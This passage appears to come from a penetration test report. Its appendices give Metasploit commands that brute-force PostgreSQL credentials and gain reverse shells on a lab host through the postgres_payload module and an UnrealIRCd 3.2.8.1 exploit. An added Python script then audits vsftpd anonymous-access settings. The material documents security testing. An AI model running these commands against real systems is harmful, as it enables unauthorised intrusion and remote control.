the command: ```bash show databases; ``` A list of databases on the mysql server ![[Attachments/074f747881c00fe53066a7243174676e_MD5.png]] ## Appendix 12 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 use msfconsole search for postgress auxiliary ![[Attachments/095fd5ed6d2d1b27e8ae8090c8a906a6_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash run ``` Successful username and password 
found ![[Attachments/119a59eb7baf203822b65d0dfd426bfe_MD5.png]] Getting Reverse shell using linux/postgres/postgres_payload msfconsole module ![[Attachments/5221f66b34021c8a0f39a85933d3d3bc_MD5.png]] Terminal Access ![[Attachments/35a2914f7667f2314905d662b46d96da_MD5.png]] ## Appendix 13 unrealirc Unreal3.2.8.1. port 6667 use `msfconsole` `search unrealirc` `use 0` ![[Attachments/64429f7b2a13f03e2c18adf1a4baab67_MD5.png]] ```bash set RHOSTS 10.0.1.3 ``` ```bash set payload 6 ``` ```bash options ``` ```bash set LHOST 10.0.1.1 ``` ```bash run ``` Reverse Shell Achieved ![[Attachments/e98fecbd90364f537325761a177354dc_MD5.png]]
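The FTP Server Anonymous Access finding above recommends disabling anonymous logins, or restricting them to read-only, and auditing the server settings regularly. The following Python audit is an added example (not code from this report or from vsftpd) that checks a vsftpd configuration for exactly those settings; it assumes the option names and defaults documented in vsftpd.conf, and the sample configurations are constructed rather than taken from the tested host.

```python
"""Audit a vsftpd configuration for anonymous-access weaknesses.
Added example for the FTP anonymous-access finding, not code from the report.
Option names/defaults follow the vsftpd.conf man page; sample configs are constructed."""

# Options that widen anonymous access when enabled: (vsftpd default, reason).
ANON_OPTIONS = {
    "anonymous_enable": ("YES", "anonymous logins are permitted"),
    "anon_upload_enable": ("NO", "anonymous users may upload files"),
    "anon_mkdir_write_enable": ("NO", "anonymous users may create directories"),
    "anon_other_write_enable": ("NO", "anonymous users may delete or rename files"),
}

def parse_vsftpd_conf(text):
    """Return {option: value} from key=value lines; comments and blanks are skipped."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and "=" in line:
            key, value = line.split("=", 1)
            conf[key.strip()] = value.strip()
    return conf

def is_enabled(value):
    """vsftpd treats YES/TRUE/1 (any case) as a true boolean."""
    return value.strip().upper() in ("YES", "TRUE", "1")

def audit_anonymous_access(conf_text):
    """Return [(option, reason)] findings; an empty list means anonymous access is off."""
    conf = parse_vsftpd_conf(conf_text)
    def enabled(opt, default):
        return is_enabled(conf.get(opt, default))
    if not enabled("anonymous_enable", "YES"):
        return []  # anonymous logins disabled: the anon_* write options are moot
    findings = [("anonymous_enable", ANON_OPTIONS["anonymous_enable"][1])]
    # anon_* write options only take effect when write_enable=YES (default NO).
    if enabled("write_enable", "NO"):
        for opt in ("anon_upload_enable", "anon_mkdir_write_enable", "anon_other_write_enable"):
            if enabled(opt, ANON_OPTIONS[opt][0]):
                findings.append((opt, ANON_OPTIONS[opt][1]))
    return findings

# Constructed samples: the weak setting, the read-only compromise, and the hardened form.
WEAK_CONF = "anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\n"
READ_ONLY_ANON_CONF = "anonymous_enable=YES\nwrite_enable=NO\nanon_upload_enable=YES\n"
HARDENED_CONF = "# anonymous access disabled\nanonymous_enable=NO\nlocal_enable=YES\nwrite_enable=YES\n"

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("read-only", READ_ONLY_ANON_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_anonymous_access(conf) or "no anonymous-access findings")
```

Note that an empty configuration is reported as vulnerable, because upstream vsftpd defaults anonymous_enable to YES when the option is absent.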